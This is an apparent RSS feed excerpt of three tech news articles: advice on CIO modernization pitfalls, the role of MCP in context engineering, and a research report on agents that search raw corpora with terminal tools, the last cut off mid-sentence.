<guid isPermaLink="true">https://tsecurity.de/de/3545319/it-nachrichten/8-it-modernization-traps-cios-must-avoid/</guid>
<pubDate>Mon, 25 May 2026 12:16:00 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>With cloud migration, digital transformation, and now the drive for AI adoption, CIOs face a real imperative to get modernization right.</p>



<p>However, industry research continues to show that modernization projects can fail to deliver the promised benefits and suffer cost overruns, even as the appetite for overhauling legacy technology grows.</p>



<p>CIOs, enterprise technology leaders, and advisors offer advice on some of the most common modernization pitfalls and how to avoid them.</p>



<h2 class="wp-block-heading">1. Stacking new technologies on top of legacy systems</h2>



<p>Experience has taught <a href="https://www.linkedin.com/in/bill-pappas-9a35048" rel="nofollow">Bill Pappas</a>, who as EVP and head of global technology and operations has managed IT modernization at 158-year-old company MetLife, that CIOs should avoid “stacking new technologies on top of outdated, overly complex legacy systems”.</p>



<p>“Modernization is not a race to deploy the newest tools; it’s a disciplined effort to create enterprise value,” Pappas says.</p>



<p>In most cases, new technologies, particularly AI, can’t simply be bolted on to the existing infrastructure.</p>



<p>“Instead of driving transformation, organizations end up with expensive solutions that cannot scale or integrate properly. These systems also introduce added security and compliance risks, leaving organizations vulnerable to breaches and regulatory failures,” he says.</p>



<p>CIOs’ starting point should instead be simplification, which includes <a href="https://www.cio.com/article/4036547/how-to-build-data-foundations-for-ai-exploration.html">strengthening data foundations</a>, <a href="https://www.cio.com/article/189523/8-tips-for-streamlining-legacy-it.html">streamlining legacy systems</a>, and linking IT initiatives with business objectives and customer outcomes.</p>



<p>“By focusing on simplification, security, and strategic alignment, CIOs can unlock transformation without falling into the traps created by outdated technology,” he says.</p>



<h2 class="wp-block-heading">2. Overlooking cultural and leadership fit</h2>



<p><a href="https://www.linkedin.com/in/gdouglasking/" rel="nofollow">Doug King</a>, CIO of ePlus, cautions CIOs that a siloed approach to modernization risks failure because it overlooks the deeper cultural and leadership shifts needed to move the organization toward a shared vision of transformation.</p>



<p>The risk is that modernization efforts become a series of disconnected projects instead of a cohesive ongoing transformation that benefits the entire organization. “Ignoring alignment risks wasted resources and investments falling short of delivering meaningful business value,” he adds.</p>



<p>His advice to CIOs is to engage cross-functional leaders, clarify decision-making roles, and focus on the business transformation narrative. “CIOs need to make trust-building and organizational alignment core to their strategy, ensuring every team understands the broader vision and is working together toward it,” he says.</p>



<p>Above all, organizations must clearly identify and articulate what they hope to accomplish and remain grounded in why they’re modernizing. “Modernization isn’t a one-time path your organization travels; it’s an ongoing journey,” he says.</p>



<h2 class="wp-block-heading">3. Treating cloud migration as the finish line</h2>



<p>Many organizations declare success once applications are moved to the cloud, but that mindset can stall modernization just as it should accelerate. Andy Tay, global lead for Accenture Cloud First, warns that cloud migration is often mistaken for transformation. “Cloud migration isn’t the finish line; it’s the starting block,” Tay says.</p>



<p>Without ongoing modernization — spanning architecture, data, operating models, and ways of working — cloud platforms can struggle to deliver sustained business value or support AI-driven innovation. “Leading organizations modernize while they migrate and treat cloud as a business enabler, not just an IT project,” he tells CIO.</p>



<p>CIOs should treat cloud as a living platform, continuously improved through automation, security-by-design, cost governance and AI-enabled operations, rather than a one-time migration milestone, says Tay.</p>



<h2 class="wp-block-heading">4. Repeating cloud mistakes with AI adoption</h2>



<p>Organizations — and CIOs — are under intense pressure to <a href="https://www.cio.com/article/3982258/ceos-top-priorities-for-it-leaders-today.html">move quickly with AI adoption</a>, but <a href="https://www.csoonline.com/article/3529615/companies-skip-security-hardening-in-rush-to-adopt-ai.html">speed mustn’t overshadow security</a>, says Blue Mantis CIO <a href="https://www.linkedin.com/in/richardkamos/" rel="nofollow">Richard Amos</a>.</p>



<p>“The rapid acceleration of AI adoption in the enterprise reminds me of the early days of public cloud transformation,” says Amos.</p>



<p>As with cloud, AI requires a robust approach to safeguarding data, models, and agents.</p>



<p>“The stakes are even higher with agentic AI, which automates complex, knowledge-based workflows, but also significantly expands the attack surface,” he says.</p>



<p>Agentic AI in particular <a href="https://www.csoonline.com/article/4109999/agentic-ai-already-hinting-at-cybersecuritys-pending-identity-crisis.html">demands rigorous identity and data access management</a>, with agents</p>



<p>treated as first-class digital identities, with least-privilege access that is task-scoped, time-bound, and continuously monitored, according to Amos.</p>



<p>“Anything less creates unnecessary risks. Human validation should also be mandatory for sensitive actions affecting financial, legal, or customer-impacting domains,” he says.</p>



<p>His advice is not to overlook strong data security and privacy controls, especially for regulated industries, such as data obfuscation, encryption, lifecycle management, and clear supplier oversight. Layered prompts, input/output filters, and explicit permission gating before tools or <a href="https://www.csoonline.com/article/4148315/apis-are-the-new-perimeter-heres-how-cisos-are-securing-them.html">APIs are invoked</a> are recommended to guard against prompt injection and misuse.</p>



<p>Best practice is to align agentic AI with governance and regulatory standards through a cross-functional <a href="https://www.cio.com/article/3984527/how-to-establish-an-effective-ai-grc-framework.html">AI governance</a> office to ensure compliance with existing and emerging regulations.</p>



<p>“Agentic AI delivers transformational potential, but its benefits will only be realized with robust security and governance,” he says.</p>



<h2 class="wp-block-heading">5. Overlooking a strong foundation of data quality</h2>



<p>CIOs often frame modernization as a tech refresh, and focus on new platforms, cloud migrations, and cutting-edge tools, but often overlook the foundation piece: “The quality of your data and how well it’s integrated,” says <a href="https://www.linkedin.com/in/conalg/" rel="nofollow">Conal Gallaghe</a>r, CIO and CISO of Flexera.</p>



<p>“This becomes a trap because modernization without clean, connected data is bound to fall apart. Poor data governance and fragmented systems create blind spots that undermine analytics, automation, and decision-making,” he says.</p>



<p>The problem is that CIOs assume that upgrading systems automatically improves data integrity, but <a href="https://www.cio.com/article/4162306/data-debt-ai-value-killer.html">modernization amplifies complexity</a> when integration isn’t prioritized. “Instead of reducing silos, organizations can end up stacking them higher,” he says.</p>



<p>The uptake of AI, which requires high-quality, integrated data, can escalate the problem, creating flawed insights and eroding trust. “With companies integrating AI at such a rapid pace this year and planning to in the near future, this becomes a much bigger point of contention,” he tells CIO.</p>



<p>Gallagher recommends that CIOs start any modernization initiatives with <a href="https://www.cio.com/article/202183/what-is-data-governance-a-best-practices-framework-for-managing-data-assets.html">data governance</a> policies and look at <a href="https://www.cio.com/article/657969/breaking-down-data-silos-for-digital-success.html">unifying data across vendors and platforms</a>.</p>



<p>Data strategies should be tied to business outcomes to guarantee that usability becomes a core success metric of transformation efforts. “If teams can’t access and trust the data, modernization of ROI will remain elusive,” he adds</p>



<p>Above all, data should be <a href="https://www.cio.com/article/4068979/how-treating-data-as-a-product-transformed-our-retail-intelligence-stack.html">treated as a product</a> that requires a cross-functional approach across core business units, security, and IT.</p>



<p>“Modernization isn’t complete when systems are upgraded; it’s complete when insights are accurate, timely, and actionable,” he says.</p>



<h2 class="wp-block-heading">6. Disregarding the ‘emotional debt’ of legacy tech</h2>



<p>“Everyone loves to talk about technical debt, but they conveniently ignore or avoid the emotional damage that comes with it,” says <a href="https://www.linkedin.com/in/john-boesen/" rel="nofollow">John Boesen</a>, chief digital information officer at Plan A Technologies.</p>



<p>It’s a script familiar to many: Years of surprise changes, failed projects, and broken promises create a quiet cynicism inside teams.</p>



<p>“We’ve all seen this — leadership announces a big modernization push, but deep down no one believes it, even if no one says it out loud. That doubt is real,” he says.</p>



<p>To lay the groundwork for success, Boesen is a fan of “future postmortems” that may seem counterintuitive as a planning session.</p>



<p>“Bring the team together and write a postmortem dated two years from now, assuming the modernization failed. Then ask, ‘Why did this happen? Who felt the pain? What went wrong?’” he tells CIO. “A future postmortem exposes risks no one brings up in traditional meetings and leads to a far more honest and realistic roadmap.”</p>



<h2 class="wp-block-heading">7. Not linking modernization to business value</h2>



<p>“Even as enterprises pour money into AI, cloud, and automation, the failure rate remains stubbornly high,” says <a href="https://www.linkedin.com/in/matthew-guarini/" rel="nofollow">Matthew Guarini,</a> executive director of Technology Business Management Council and former National Grid’s US CIO.</p>



<p>Guarini points to <a href="https://www.mckinsey.com/capabilities/transformation/our-insights/perspectives-on-transformation" rel="nofollow">research from McKinsey</a> that 70% of digital transformation initiatives failed to meet their objectives in 2025, despite years of effort and trillions of dollars.</p>



<p>“A major challenge of IT modernization is the difficulty enterprises face in delivering value from their IT investments,” he says.</p>



<p>And with the enterprise technology landscape increasingly complex and the real prospect of failure rates, CEOs and CFOs are wary of making investments, according to Guarini. Instead, CIOs need to connect technology resources to business outcomes such as increased revenue, greater productivity, enhanced innovation, or improved sustainability.</p>



<p>“Pressured to modernize, CIOs must leverage technology to deliver value from their IT investments, but most tech leaders focus disproportionately on the nuts and bolts of their innovations rather than the true goal of modernization: delivering value to customers and employees,” says Guarini.</p>



<h2 class="wp-block-heading">8. Treating modernization as a big bang replacement</h2>



<p>Another path that can lead to failure is assuming modernization must happen all at once. When organizations talk about modernization, they often think in extremes. “When people think about modernization, they often imagine replacing everything at once or maintaining two parallel worlds in conflict,” Boesen says.</p>



<p>Instead, he advocates creating intentional zones where legacy and modern systems work side by side, each with a clear purpose. “This reduces disruption, controls costs, and allows change to happen at a pace the organization can genuinely absorb. It is a more realistic and more human way to handle a process that is usually more complex than it appears,” he says.</p>



<p>Boesen likens IT environments to cities rather than machines. “Some neighborhoods are brand new, others are historic, and there is always some construction happening somewhere,” he says. The challenge for CIOs is not rebuilding everything at once, but deciding which areas to renovate first to create the greatest impact.</p>



<p>“To prioritize this, the path is simple: Listen to the people closest to the problems and give weight to impact. That is how you focus on what really moves the needle,” he says.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The role of MCP in context engineering]]></title>
<description><![CDATA[There’s no denying the excitement around Model Context Protocol (MCP), an open protocol for connecting AI assistants with external data, tools, and APIs. Since its debut by Anthropic in late 2024, thousands of MCP servers have emerged for devops, cloud, and beyond.



Now that developers have int...]]></description>
<link>https://tsecurity.de/de/3545164/ai-nachrichten/the-role-of-mcp-in-context-engineering/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3545164/ai-nachrichten/the-role-of-mcp-in-context-engineering/</guid>
<pubDate>Mon, 25 May 2026 11:02:53 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>There’s no denying the excitement around <a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">Model Context Protocol</a> (MCP), an open protocol for connecting AI assistants with external data, tools, and APIs. Since its debut by Anthropic in late 2024, thousands of MCP servers have emerged for <a href="https://www.infoworld.com/article/4096223/10-mcp-servers-for-devops.html">devops</a>, <a href="https://www.infoworld.com/article/4129024/five-mcp-servers-to-rule-the-cloud.html">cloud</a>, and beyond.</p>



<p>Now that developers have integrated MCP servers into applications, and they have been battle-tested, usage patterns are emerging. For instance, supplying better context for AI is the most commonly cited primary value of using MCP, according to Zuplo’s <a href="https://zuplo.com/mcp-report">State of MCP report</a> released in early 2026. The Zuplo report also found that 63% of MCP users adopt MCP servers for accessing data sources such as documentation or knowledge bases.</p>



<p>In software development, <a href="https://www.infoworld.com/article/4127462/what-is-context-engineering-and-why-its-the-new-ai-architecture.html">context engineering</a> is the act of supplying <a href="https://www.infoworld.com/article/4024327/12-ai-coding-agents-at-the-cutting-edge.html">AI coding agents</a> with relevant data and capabilities to improve the accuracy and relevance of their outputs. It also involves optimizing the breadth of information to guide efficient processing. Such context can include coding style, internal libraries, <a href="https://www.infoworld.com/article/4091400/anatomy-of-an-ai-agent-knowledge-base.html">institutional knowledge</a>, production data, and <a href="https://www.infoworld.com/article/4120322/how-should-ai-agents-consume-external-data.html">external data</a> from platforms like Slack, Atlassian, Notion, or GitHub, among others.</p>



<p>“MCPs support context engineering because it creates a standard way for AI systems to connect to various business tools,” says <a href="https://www.linkedin.com/in/toddaolson/">Todd Olson</a>, CEO of <a href="https://www.pendo.io/">Pendo</a>, a product experience platform. “The key benefit is that the agent determines what context it needs based on the question, then uses the appropriate MCP server to fetch that information in real time.”</p>



<p>With the rise in AI-assisted coding, MCP is becoming a doorway for real-time dynamic search and retrieval across various sources, playing an important role in context engineering efforts. As <a href="https://www.linkedin.com/in/theoutdoorprogrammer/">Joey Stout</a>, solutions architect at <a href="https://spacelift.io/">Spacelift</a>, an infrastructure orchestration platform, puts it, MCP is the “saving grace of vibe coding.”</p>



<h2 class="wp-block-heading"><a></a>How MCP boosts context engineering</h2>



<p>Using MCP, agents can fetch structured data contextually relevant to the task at hand. According to <a href="https://www.linkedin.com/in/kussberg/">Edgar Kussberg</a>, group product manager at <a href="https://www.sonarsource.com/">Sonar</a>, MCP accelerates the knowledge-hunting engineers must routinely perform on a daily basis.</p>



<p>“When an engineer needs to answer a question, they do not rely on memory alone,” says Kussberg. “They navigate code repositories, dashboards, CI systems, documentation, and security reports, pulling information from each system as needed. MCP gives AI agents that same capability.”</p>



<p>Many of the most popular MCP servers retrieve contextual information to improve agentic coding. For example, an MCP server from <a href="https://github.com/upstash/context7">Context7</a> provides up-to-date documentation, while another from <a href="https://github.com/modelcontextprotocol/servers/tree/main/src/filesystem">Filesystem</a> pulls from any directory on a local machine. An MCP server from <a href="https://docs.sentry.io/ai/mcp/">Sentry</a> accesses production issues and errors, a server from <a href="https://www.sonarsource.com/products/sonarqube/mcp-server/?utm_source=google&amp;utm_medium=cpc&amp;utm_campaign=SQ-NA-US-East-Brand-Beinc&amp;utm_content=mcp-server&amp;utm_term=sonarqube%20mcp%20server&amp;s_campaign=SQ-NA-US-East-Brand-Beinc&amp;s_content=mcp-server&amp;s_term=sonarqube%20mcp%20server&amp;s_category=Paid&amp;s_source=Paid%20Search&amp;s_origin=Google&amp;cq_src=google_ads&amp;cq_cmp=23576298435&amp;cq_con=196318441871&amp;cq_term=sonarqube%20mcp%20server&amp;cq_med=&amp;cq_plac=&amp;cq_net=g&amp;cq_pos=&amp;cq_plt=gp&amp;utm_source=google&amp;utm_medium=cpc&amp;utm_campaign=SQ-NA-US-East-Brand-Beinc&amp;utm_content=mcp-server&amp;utm_term=sonarqube%20mcp%20server&amp;s_campaign=SQ-NA-US-East-Brand-Beinc&amp;s_content=mcp-server&amp;s_term=sonarqube%20mcp%20server&amp;s_category=Paid&amp;s_source=Paid%20Search&amp;s_origin=Google&amp;cq_src=google_ads&amp;cq_cmp=23576298435&amp;cq_con=196318441871&amp;cq_term=sonarqube%20mcp%20server&amp;cq_med=&amp;cq_plac=&amp;cq_net=g&amp;cq_pos=&amp;cq_plt=gp&amp;gad_source=1&amp;gad_campaignid=23576298435&amp;gbraid=0AAAAAC0fKmo3CzAuxD-J1yoRRbolpI2DZ&amp;gclid=Cj0KCQjwv-LOBhCdARIsAM5hdKcg5cAclxuhMymQNu4C1OJatpQNdVIzGz6d1fO_sjighYg9ce0Pfi8aApUKEALw_wcB">SonarQube</a> exposes security issues, and a server from <a href="https://www.multiplayer.app/docs/ai/mcp-server/">Multiplayer</a> returns user session data.</p>



<p>The great thing about using MCP for these situations is that it avoids the need to put large code chunks in every prompt. Instead, coding context like relevant methods, dependencies, or recent changes can be called at runtime, says <a href="https://www.linkedin.com/in/jvenugopal/">Venugopal Jidigam</a>, head of agentic platform engineering at <a href="https://www.wavemaker.com/">WaveMaker</a>, an agentic development platform. “The MCP server assembles and returns scoped, structured context, which the model then uses to reason and respond accurately,” he says.</p>



<p>Another common context-gathering example is retrieving institutional knowledge. “Instead of hardcoding that knowledge into the model, the agent uses MCP to retrieve relevant documents or data at runtime,” says <a href="https://www.linkedin.com/in/ebrahim-alareqi-1b570048/">Ebrahim Alareqi</a>, principal machine learning engineer at <a href="https://www.incorta.com/">Incorta</a>, a data and analytics platform provider. “This keeps the agent lightweight while still giving it access to enterprise-specific context when needed.”</p>



<p>Others praise MCP for its role in bringing common standards to agentic data retrieval. “MCP provides the plumbing that makes context engineering practical,” says <a href="https://www.linkedin.com/in/gilfeig/">Gil Feig</a>, co-founder and CTO at <a href="https://www.merge.dev/">Merge</a>, an API platform provider. Without standards, teams end up building fragile custom data pipelines that break often, he adds.</p>



<h2 class="wp-block-heading"><a></a>Benefits of using MCP for gathering context</h2>



<p>AI-assisted coding has some challenges. Most notably is a trust issue. The vast majority of developers don’t trust the output of AI coding agents — 96%, according to Sonar’s 2026 <a href="https://www.sonarsource.com/company/press-releases/sonar-data-reveals-critical-verification-gap-in-ai-coding/">State of Code Developer Survey report</a>. A second challenge is increased time spent reviewing and debugging AI-generated code. A late <a href="https://stackoverflow.blog/2025/12/29/developers-remain-willing-but-reluctant-to-use-ai-the-2025-developer-survey-results-are-here/">2025 StackOverflow survey</a> found nearly half of developers report frustration dealing with AI solutions that are “almost right, but not quite”.</p>



<p>Context engineering, as well as the use of MCP for this purpose, could help overcome many of these challenges. Using MCP servers, engineers can automatically append relevant logs or internal data to their prompts, refining LLM processing considerably to avoid irrelevant outputs.</p>



<p>The end result is improved accuracy. “MCP allows systems to dynamically fetch what the model needs, like APIs, databases, files, or domain knowledge,” says <a href="https://www.linkedin.com/in/neeraj-abhyankar-9040141/">Neeraj Abhyankar</a>, VP of data and AI at <a href="https://www.rsystems.com/">R Systems</a>, a digital product engineering company. “This makes prompts leaner, reduces hallucinations, and ensures models operate with task‑relevant context.”</p>



<p>Another huge benefit is better context window management. Using MCP for context engineering can enable more efficient interaction with underlying models. “MCP tools can save you thousands of tokens just by ensuring you’re using the right things,” says Spacelift’s Stout.</p>



<p>Stout specifically highlights the <a href="https://github.com/github/github-mcp-server">GitHub MCP server</a>. “It can now access specific files directly from GitHub and do GitHub searching and all the bells and whistles you expect when referencing GitHub,” he says. “MCP made retrieval from GitHub a million times better.”</p>



<p>Using MCP also enhances autonomy and scalability across an enterprise. “Teams can stop relying on partial views or anecdotal evidence and instead operate from a shared understanding,” says Pendo’s Olson. This greatly reduces the friction typically involved in stitching tools, building reports, or looping in teammates, he says.</p>



<p>All in all, the experts say the benefits of MCP in context engineering are numerous. Standardizing on MCP affords more focused prompts that generate more explicitly and relevant context, decreasing the likelihood of LLM hallucination and optimizing what the agent acts on. This in turn can lessen the manual review required for validation and debugging, reclaiming some developer time in the process.</p>



<p>Together, these benefits aim to solve many of the core issues inherent in <a href="https://www.infoworld.com/article/3844363/why-ai-generated-code-isnt-good-enough-and-how-it-will-get-better.html">AI-generated code</a> and <a href="https://www.infoworld.com/article/4035926/multi-agent-ai-workflows-the-next-evolution-of-ai-coding.html">agentic workflows</a> at large. “MCP shifts AI development from fragile prompt tuning to repeatable engineering,” says WaveMaker’s Jidigam. “The result is consistent behavior, minimal data exposure, and AI systems that can scale.”</p>



<h2 class="wp-block-heading"><a></a>To MCP, or not to MCP</h2>



<p>Experts agree MCP can go beyond <a href="https://www.infoworld.com/article/2335814/what-is-retrieval-augmented-generation-more-accurate-and-reliable-llms.html">retrieval augmented generation</a> (RAG) to provide more timely and relevant content in a more optimized fashion. “Traditional knowledge bases and RAG pipelines rely on pre-indexed snapshots,” says Sonar’s Kussberg. “In fast-moving environments, this quickly becomes outdated.”</p>



<p>For this reason and others, MCP unlocks all kinds of possibilities for developers. That said, the protocol is <a href="https://thenewstack.io/when-is-mcp-actually-worth-it/">not a silver bullet</a> for all use cases. It’s up against competing <a href="https://www.infoworld.com/article/4007686/a-developers-guide-to-ai-protocols-mcp-a2a-and-acp.html">agentic protocols</a> for some scenarios, and even simple CLI or direct API access for others.</p>



<p>Ballooning portfolios of MCP servers can <a href="https://www.reddit.com/r/ClaudeAI/comments/1rzz784/mcp_is_costing_you_37_more_tokens_than_necessary/">increase LLM inputs substantially</a>, too, requiring <a href="https://thenewstack.io/how-to-reduce-mcp-token-bloat/">vigilant optimization techniques</a> to avoid hitting token limits. Such strategies include intentionally designing tools, progressive disclosure, automated discovery, and other emerging tactics.</p>



<p>Then, there are <a href="https://thenewstack.io/building-with-mcp-mind-the-security-gaps/">MCP-related security concerns</a>. The security model for the MCP protocol itself has <a href="https://modelcontextprotocol.io/docs/tutorials/security/authorization">matured quite a bit</a>, but it’s incumbent upon implementers to enforce the correct permissions. “MCP, when implemented the right way, lets you enforce policy-driven access controls,” says Merge’s Feig. This should prevent a junior engineer, for instance, from accessing logs they’re not authorized to access, even if the agent has broader permissions, he adds.</p>



<p>To boost confidence using MCP within enterprise development settings, many experts recommend using an <a href="https://www.infoworld.com/article/4145014/how-to-build-an-enterprise-grade-mcp-registry.html">MCP registry</a> that houses vetted, governed MCP servers approved for internal use. Other tools and practices, including <a href="https://www.infoworld.com/article/4115115/visual-studio-code-adds-support-for-agent-skills.html">agent skills</a>, <a href="https://thenewstack.io/port-of-context-the-open-source-code-mode/">code mode</a>, and emerging <a href="https://nordicapis.com/why-ai-agents-need-deterministic-api-workflows/">specifications for deterministic AI</a> also promise to play a role in establishing context for agents.</p>



<p>Beyond MCP itself, Stout recommends using Claude Code’s <a href="https://medium.com/@joe.njenga/claude-code-just-cut-mcp-context-bloat-by-46-9-51k-tokens-down-to-8-5k-with-new-tool-search-ddf9e905f734">tool search feature</a>, which searches for tools without using token windows. He also highlights Sisyphus, an <a href="https://opencode.ai/">OpenCode</a>-compatible agent for matching models with different tasks, and <a href="https://plannotator.ai/">Plannotator</a>, a plugin for Claude Code and OpenCode that can be used to plan projects, both of which can aid optimization.</p>



<h2 class="wp-block-heading">Context is king</h2>



<p>The pace of MCP development is accelerating. Analysis of 1,400 MCP servers by <a href="https://bloomberry.com/blog/we-analyzed-1400-mcp-servers-heres-what-we-learned/">Bloomberry</a> charted a 232% increase in six months, from August 2025 to February 2026. Interestingly, read operations outpaced write operations two to one, indicating these servers are performing a significant amount of data retrieval.</p>



<p>Looking to the future, context engineering is anticipated to continue cementing itself as a software discipline, while MCP wields the power to transform APIs into engines for agentic reasoning. As Jidigam says, “MCP-like abstractions will become standard infrastructure, much like REST did in earlier eras.”</p>



<p>Others are similarly confident. “In context engineering, MCP becomes the control plane agents use to access context, tools, and actions,” adds Incorta’s Alareqi. “It will be foundational as software becomes increasingly agent-driven.”</p>



<p>The underlying takeaway: MCP already plays a large role in context engineering, and will continue to do so. As the standard interface between AI systems and data, MCP is the primary vessel for dynamic cross-platform context retrieval at run time, allowing engineers to fetch documentation, API references, policies, available actions, and more.</p>



<p>However, this doesn’t mean context engineering has reached its zenith. Looking ahead, context engineering will evolve from fetching information to coordinating it, says Kussberg, combining multiple MCPs along the way. This will require increased discipline in enforcing standards, assessing risks, and validating changes more often, he says.</p>



<p>So, get started with context engineering using MCP, and stay alert to how your MCP servers are impacting LLM token usage and shaping workflows. The difference between context and non-context matters. Because, as they say, context is king.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Your AI agents need a terminal, not just a vector database]]></title>
<description><![CDATA[When agentic workflows fail, developers often assume the problem lies in the underlying model’s reasoning abilities. In reality, the limited information provided by the retrieval interface is often the primary limiting factor.Researchers at multiple universities propose a technique called direct ...]]></description>
<link>https://tsecurity.de/de/3540878/it-nachrichten/your-ai-agents-need-a-terminal-not-just-a-vector-database/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3540878/it-nachrichten/your-ai-agents-need-a-terminal-not-just-a-vector-database/</guid>
<pubDate>Sat, 23 May 2026 00:02:47 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>When agentic workflows fail, developers often assume the problem lies in the underlying model’s reasoning abilities. In reality, the limited information provided by the retrieval interface is often the primary limiting factor.</p><p>Researchers at multiple universities propose a technique called <a href="https://arxiv.org/abs/2605.05242">direct corpus interaction</a> (DCI) that lets agents bypass embedding models entirely, searching raw corpora directly using standard command-line tools.</p><h2>The limits of classic retrieval</h2><p>In <a href="https://venturebeat.com/data/the-rag-era-is-ending-for-agentic-ai-a-new-compilation-stage-knowledge-layer-is-what-comes-next">classic retrieval systems such as RAG</a>, documents are chunked, converted into vector representations (or embeddings), and indexed offline in a vector database. When an AI system processes a query, a retriever filters the entire database to return a ranked "top-k" list of document snippets that match the query. All evidence must pass through this scoring mechanism before any downstream reasoning occurs.</p><p>But modern agentic applications demand much more. "Dense retrieval is very useful for broad semantic recall, but when an agent has to solve a multi-step task, it often needs to search for exact strings, numbers, versions, error codes, file paths, or sparse combinations of clues," the authors of the DCI paper said in comments provided to VentureBeat. "These long-tail details are precisely where semantic similarity can be brittle."</p><p>Unlike static search, agents must also revise their search plans dynamically after observing partial or localized evidence. Exact lexical constraints and multi-step hypothesis refinement are difficult to execute with semantic retrievers. Because the retriever compresses access into a single step, any critical evidence filtered out by the similarity search cannot be recovered later, no matter how advanced the agent's downstream reasoning capabilities are. As the authors explain, current retrieval pipelines can become a bottleneck because "they decide too early what the agent is allowed to see."</p><h2>Direct corpus interaction</h2><p>This direct access addresses a core problem in enterprise environments: data staleness. Embedding indexes are always a snapshot of a specific moment in time, taking considerable compute and time to build and maintain.</p><p>"In many enterprise settings, the data is not a stable document collection. It is daily financial reports, live logs, tickets, code commits, configuration files, incident timelines, and internal documents that keep changing," the authors said. DCI lets the agent reason over the current state of the workspace rather than yesterday's vector index.</p><p>The agent operates in a terminal-like environment where its observations are raw tool outputs such as file paths, matched text spans, and surrounding lines. The core tools provided by DCI are few but highly expressive. Agents use commands like “find” and “glob” to navigate directory structures and locate files. For exact matching, they use “grep” and “rg” to locate specific keywords, regex patterns, and exact strings. When local inspection is needed, tools like “head,” “tail,” “sed,” “cat,” and lightweight Python scripts allow the agent to peek at the context surrounding a match or read specific file sections.</p><p>The agent can combine these tools via shell pipelines to execute complex search logic in a single step. An agent can pipe commands to enforce strict lexical constraints, such as searching a file for one term and piping the output to search for a second term. It can combine multiple weak clues across a corpus by finding a specific file type, searching for a keyword like "report," and filtering for a year like "2024." It can also immediately verify a hypothesis by inspecting the exact lines around a keyword match.</p><p>DCI delegates semantic interpretation directly to the agent instead of relying on embedding-based similarity search. The agent can formulate hypotheses, test exact lexical patterns, and extract detailed information that a traditional semantic retriever might miss.</p><p>The researchers propose two versions of this system. DCI-Agent-Lite is designed as a lightweight, low-cost setup built on the GPT-5.4 nano model and restricted purely to raw terminal interactions like bash commands and basic file reads. Because reading raw files can quickly fill up a smaller model's memory, this version relies on lightweight runtime context-management strategies to sustain long-horizon exploration.</p><p>DCI-Agent-CC is the higher-performance version, designed for teams with more compute budget. It runs on <a href="https://venturebeat.com/orchestration/we-tested-anthropics-redesigned-claude-code-desktop-app-and-routines-heres-what-enterprises-should-know">Claude Code</a> powered by Claude Sonnet 4.6. Claude Code provides stronger prompting, more robust tool orchestration, and superior built-in context handling, which improves the agent's stability during complex, multi-step searches across heterogeneous datasets.</p><h2>DCI in action</h2><p>The researchers tested both versions of DCI across agentic search benchmarks like BrowseComp-Plus, knowledge-intensive QA with single-hop and multi-hop reasoning, and information retrieval ranking in tasks requiring domain-specific reasoning and scientific fact-checking.</p><p>They tested DCI against three baselines. The first included open-weight retrieval agents such as <a href="https://venturebeat.com/ai/beyond-rag-search-r1-integrates-search-engines-directly-into-reasoning-models">Search-R1</a> and proprietary agents powered by frontier models like GPT-5 and Claude Sonnet 4.6, paired with standard retrievers. The second baseline included classical sparse retrievers like BM25 and dense retrievers like OpenAI's text-embedding-3-large and Qwen3-Embedding-8B. The third baseline consisted of high-performing reasoning-oriented re-rankers like ReasonRank-32B and Rank-R1.</p><p>DCI systematically outperformed the baselines, <!-- -->according to the researchers<!-- -->. On the complex BrowseComp-Plus benchmark, swapping a traditional Qwen3 semantic retriever for DCI on a Claude Sonnet 4.6 backbone improved accuracy from 69.0% to 80.0% while reducing the API cost from $1,440 to $1,016. The return on investment for lightweight agents was also noticeable. DCI-Agent-Lite with GPT-5.4 nano competed with the OpenAI o3 model using traditional retrieval while cutting costs by more than $600.</p><p>On multi-hop QA benchmarks, DCI-Agent-CC reached an 83.0% average accuracy, improving on the strongest open-weight retrieval baseline by 30.7 points, according to the researchers.</p><p>The data shows that DCI has lower overall document recall than dense embedding models, but once it finds a relevant document, it extracts substantially more value from it.</p><p>"If an enterprise AI lead asked where DCI is most clearly useful, I would point to tasks that require exact evidence localization in a dynamic workspace: debugging production incidents, searching large codebases, analyzing logs, compliance investigation, audit trails, or multi-document root-cause analysis," the researchers note.</p><p>In one complex deep-research task, the agent had to identify a specific soccer match based on 12 interlocking clues, including exact attendance, yellow cards, and player birth dates. A traditional retriever would fail by surfacing short, disconnected snippets. Instead, the DCI agent explored the file directory, read specific lines of a 1990 England versus Belgium match report to verify the exact number of substitutions, pulled a specific quote from an interview file, and verified the exact birth dates of two players by peeking into their Wikipedia text files. By chaining these simple commands, DCI ensures that no evidence is permanently lost behind a flawed semantic search algorithm.</p><h2>Limits and practical implementation of DCI</h2><p>DCI has a clear operating envelope where it scales excellently in search depth but struggles with search breadth. When the experimental corpus was expanded from 100,000 to 400,000 documents, the system's accuracy dropped significantly and the average number of tool calls rose. While DCI is powerful once a promising document is found, the cost of locating that initial useful anchor document grows sharply as the size of the candidate space increases.</p><p>DCI also has lower broad document recall compared to dense embedding models. It trades exhaustive recall for high-resolution, local precision. If an enterprise workflow strictly requires finding every single relevant document across a massive dataset, DCI may not be the right tool.</p><p>Granting an agent expressive tools like an unrestricted bash shell increases latency and compute costs due to the high volume of iterative tool calls required to complete a search. It also creates significant context-management and security challenges for IT departments.</p><p>"Tool calls can return large outputs; long trajectories can fill the context window; and raw terminal access requires sandboxing, permission control, and careful engineering," the authors said. To manage the context window, the researchers found that moderate truncation and compaction help the 